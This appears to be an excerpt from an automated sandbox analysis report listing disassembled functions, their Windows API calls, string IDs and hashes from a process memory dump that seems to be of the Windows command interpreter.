                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1515458 Relevance: 16.7, APIs: 11, Instructions: 213fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: _get_osfhandle.MSVCRT ref: 00007FF7D1523584
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D152359C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235C3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235D9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235ED
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D1523602
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D15154DE
                                                                                                                                                                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF7D1511F7D), ref: 00007FF7D151552B
                                                                                                                                                                                                                                                                                                                                                                                                                                        • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF7D1511F7D), ref: 00007FF7D151554F
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D153345F
                                                                                                                                                                                                                                                                                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7D1511F7D), ref: 00007FF7D153347E
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7D1511F7D), ref: 00007FF7D15334C3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D15334DB
                                                                                                                                                                                                                                                                                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7D1511F7D), ref: 00007FF7D15334FA
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15236EC: _get_osfhandle.MSVCRT ref: 00007FF7D1523715
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15236EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7D1523770
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15236EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D1523791
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1356649289-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 44cbd729083780951c1f503392cbbf612fffa393e2779505a21ce0bf26885d22
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA916D22A0864B86F754AF21A40417DF7A1FB89B90FD54136DA4F476B5DFBCD4808B20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15386FC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 226timeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: LocalTime$ErrorLast_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %s$/-.$:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1644023181-879152773
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 4dd2a969bb7c23e063f632605d00564cb883c8619fe93ded7d1f8bf6df6454f3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7691B022B0864B81FB59ABA0D4502BEE2A1EF80B90FD44677D94F436B4DEBCE545C320
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D153627C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95synchronizationCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7D1537251), ref: 00007FF7D153628E
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ObjectSingleWait
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: wil
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 24740636-1589926490
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: d9dbaaaab8527c625183ccb233f0d383893d9d5630bb39c58e596b3bffe177d2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA416021A0854B87F3606B11E40027DE6A1EF86781FE08136E90B47AF4CFBDE9498721
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D153CDC0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 94windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: $Application$System
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3377411628-1881496484
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 1e034455ce6e96a1b4752c7c639978172c079bc08536209da2ef0de648cc1940
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9B417932B04A4A9AF710AB60E4403EDB7A5EB89748FD44136DA4E43B68EF7CD145C760
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15114E8 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: :$\
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3961617410-1166558509
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: e27b1f629fbc962f754ac8aec8157bc74b6ab317d06899898f530be9e7af45c0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D7219162A0864B86F7506B70A48407DF6A1EF49B90BDA8572D95F437B0DFBCD4848A21
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1517AA0 Relevance: 15.2, APIs: 10, Instructions: 221COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CreateDirectoryDriveFullNamePathTypememset
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1397130798-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 8e7edb5b5352e80bd08ad7f08d899ebe22464f4bcaa288bcf446cfe77ebb0b3e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 724f7ca6de1d2199ac7a1f6292729104aec5d7855033ff602e4af0a6132ac251
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e7edb5b5352e80bd08ad7f08d899ebe22464f4bcaa288bcf446cfe77ebb0b3e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4891A522B0868B96FB65AB10D4406BDF3A1FB84B84FC58076DA4F437A4DFBDD5818720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D152258C Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 85COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15206C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D15206D6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15206C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D15206F0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15206C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D152074D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15206C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D1520762
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF7D15225CA
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF7D15225E8
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF7D152260F
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF7D1522636
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF7D1522650
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsicmp$Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3407644289-1668778490
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 827fe39f1c827591467e2895404ed0c53e3c9c8069902dc6501238c6b755d561
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E0313A27A1851B85FB617F21E81537DA694AF85B80FE48077DA0F862B5DEBCE400C731
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1540C90 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 282COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: &()[]{}^=;!%'+,`~
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2516562204-381716982
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 4375dc26b097a0d4e61ce869035077a1322faf11560f20c30c564afb9f4490ae
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 05C1AF72A0565686E750AB65E8402BEB7A0FB44B94FE01236DE8E03BA4DF7CE490C710
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1527E80 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7D151D46E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7D151D485
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: wcschr.MSVCRT ref: 00007FF7D151D4EE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: iswspace.MSVCRT ref: 00007FF7D151D54D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: wcschr.MSVCRT ref: 00007FF7D151D569
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: wcschr.MSVCRT ref: 00007FF7D151D58C
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswspace.MSVCRT ref: 00007FF7D1527EEE
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
